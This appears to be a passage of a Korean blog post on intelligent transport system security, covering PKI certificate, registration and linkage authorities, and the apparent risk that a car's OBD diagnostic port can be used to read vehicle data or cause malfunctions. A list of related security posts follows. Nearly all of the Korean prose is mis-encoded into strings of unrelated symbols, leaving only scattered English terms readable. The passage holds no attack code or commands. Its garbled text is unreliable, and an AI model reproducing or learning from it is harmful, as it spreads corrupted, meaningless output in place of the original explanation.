ITS๋ ์ฃผํ ์ค์ธ ์ฐจ๋์ด ๊ตํต ์ธํ๋ผ์ ํต์ ํ๋ฉฐ ์ฃผ๋ณ ๊ตํต์ํฉ์ ํ์ ํ๊ณ ์ ์ฐจ๋ ๊ธ์ ๊ฑฐ๋ ๋๋ก ๋ํ๋ฌผ ๋ฑ ์ํ ์ ๋ณด๋ฅผ ์ค์๊ฐ์ผ๋ก ํ์ธํจ์ผ๋ก์จ ๊ตํต์ฌ๊ณ ๋ฅผ ์๋ฐฉํ๋ ๋ฑ, ์ PKI์ ๋๋ถ์ด ๊ณต์ ๊ฐ๋ ์ ์ธํ๋ผ ๊ธฐ์ ์ด๋ค.
ITS๋ ๊ตญ๊ฐ ์ฐจ์์ ์์ฃผ ๊ฑฐ๋ํ ์์คํ ์ด๊ธฐ ๋๋ฌธ์ ์ฌ๊ธฐ์๋ ์๋์ฐจ ๊ด๋ จ ๊ฑฐ์ ๋ชจ๋ ๊ธฐ์ ์ด ์ด๋์๋๋ค. ITS์ ์๊ตฌ๋๋ ๋ฐ ์ฌ๋ฌ ์ฑ์ง ์ค ๊ฐ์ฅ ์ค์ํ ๊ฒ์ ๋ฌด์กฐ๊ฑด ์ ๋ขฐ์ฑ์ด๋ค. ITS ์ฒด๊ณ๊ฐ ๋ฌด๋์ง๋ค๋ ๊ฒ์ ์์ฐ์ฌํด ์์ค์ ์์ฃผ ์ฌ๊ฐํ ๋ฌธ์ ๋ค. ITS ๊ธฐ์ ์ ํต์ฌ์ CA (Certificate Authority, ์ธ์ฆ๊ธฐ๊ด), RA (Registration Authority, ๋ฑ๋ก๊ธฐ๊ด), LA (Linkage Authority, ์ต๋ช ํ๊ธฐ๊ด) ๋ฑ ์ฃผ๋ก ์๋ฒ ๊ธฐ์ ์ด๊ณ , ์ด๋ฌํ ๊ธฐ์ ๋ค์ด ์์ ์ด์ผ๊ธฐํ PKI ์ฒด๊ณ์ ์ด์ฐ๋ฌ์ ธ ์ ์ฒด ITS์ ์ค์ฌ์ ์ด๋ฃฌ๋ค.
6. ์๋์ฐจ ๋ฌผ๋ฆฌ๋ณด์
์ ๊ธฐ์ ๋ค์ ๋ชจ๋ ๋ค ICT ๊ธฐ์ ์ด๋ค. ํ์ง๋ง ๊ฐ์ฅ ํฐ ์ํ์, ์๋์ฐจ ์์ฒด๋ค. ์ด๋ฐ์ ๋ฐ ์๋ฒ๋ค๋ณด๋ค ์๋์ฐจ๋ฅผ ์ง์ ์กฐ์ํด๋ฒ๋ฆฌ๋ ๊ฒ ๊ฐ์ฅ ๊ฐํธํ ํดํน ๋ฐฉ๋ฒ์ด๊ธฐ ๋๋ฌธ์ด๋ค.
๊ทธ ์ํ์ ์ง๊ธ ์์ค์ ํ๋งค๋๋ ๋๋ถ๋ถ์ ์๋์ฐจ์ ๋ํด์๋ ํด๋นํ๋ ๋ฌธ์ ๋ค. ๋๋ถ๋ถ์ ์ฐจ๋์๋ ์ฐจ๋์ ๋ณด ์์ง์ฅ์น์ธ’OBD(On-board Diagnostics)’ ๋จ์๊ฐ ์ค์น๋์ด ์๋ค. ๋ฌธ์ ๋ OBD๋ฅผ ํตํด ์ฝ๊ฒ ์๋์ฐจ ๊ด๋ จ ์ ๋ณด๋ฅผ ์์งํ ์ ์๊ณ ๋์๊ฐ ์๋์ฐจ๊ฐ ์ค์๋ํ๋๋ก ์กฐ์ํ ์๋ ์๋ค๋ ์ ์ด๋ค. OBD๋ ์ฐจ๋ ๋ด๋ถ์ ์์ด์ ์ฐจ์ฃผ ์ธ์๋ ์ฝ๊ฒ ์ ๊ทผํ ์ ์๋ค๊ณ ๊ฐ์ ํ๊ธฐ ๋๋ฌธ์ ์ฐจ๋ฌธ ๊ฐํ์ฅ์น ์ธ์๋ ๋ฐ๋ก ํน๋ณํ ๋ณด์์กฐ์น๊ฐ ์๋ค. ๋ ํฐ ๋ฌธ์ ๋ ์ด๋ ๋ฏ OBD๊ฐ ๋ถ์คํ๊ฒ ๊ด๋ฆฌ๋๊ณ ์์์๋ ๋ถ๊ตฌํ๊ณ OBD์ ์ฐ๊ฒฐ๋๋ ๊ธฐ๊ธฐ์ ์๊ฐ ์ ์ฐจ ๋๊ณ ์๋ค๋ ์ฌ์ค์ด๋ค. ๊ณง ์ค์ฉํ๋ ์์จ์ฃผํ ๊ด๋ จ ์ฅ์น ๋ํ OBD์ ์ฐ๊ฒฐ๋ ๊ฒ์ด๋ค. ํด์ปค ์ ์ฅ์์ ๋ณด์๋ฉด ๋ฌด์ ํต์ ์ ์ด์ฉํ ํดํน๋ณด๋ค OBD๋ฅผ ์ง์ ๋ ธ๋ฆฌ๋ ํดํน์ด ํจ์ฌ ๋ ํจ์จ์ ์ด๋ค. ์ฐจ๋ฌธ๋ง ๋ฐ๋ฉด ๊ทธ๋ง์ด๋๊น.
'Security' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[๊ณผ์ ์ ๋ฆฌ] Windows Driver ์ทจ์ฝ์ (0) | 2023.03.17 |
---|---|
[๊ณผ์ ์ ๋ฆฌ] SSL library hooking (0) | 2023.03.17 |
[๊ณผ์ ์ ๋ฆฌ] Remote Code Execution (0) | 2023.03.17 |
[๊ณผ์ ์ ๋ฆฌ] CARVING ํ์จ์ด ์ถ์ถ (0) | 2023.03.17 |
[MC++๋ฆฌํฌํธ] (0) | 2023.03.17 |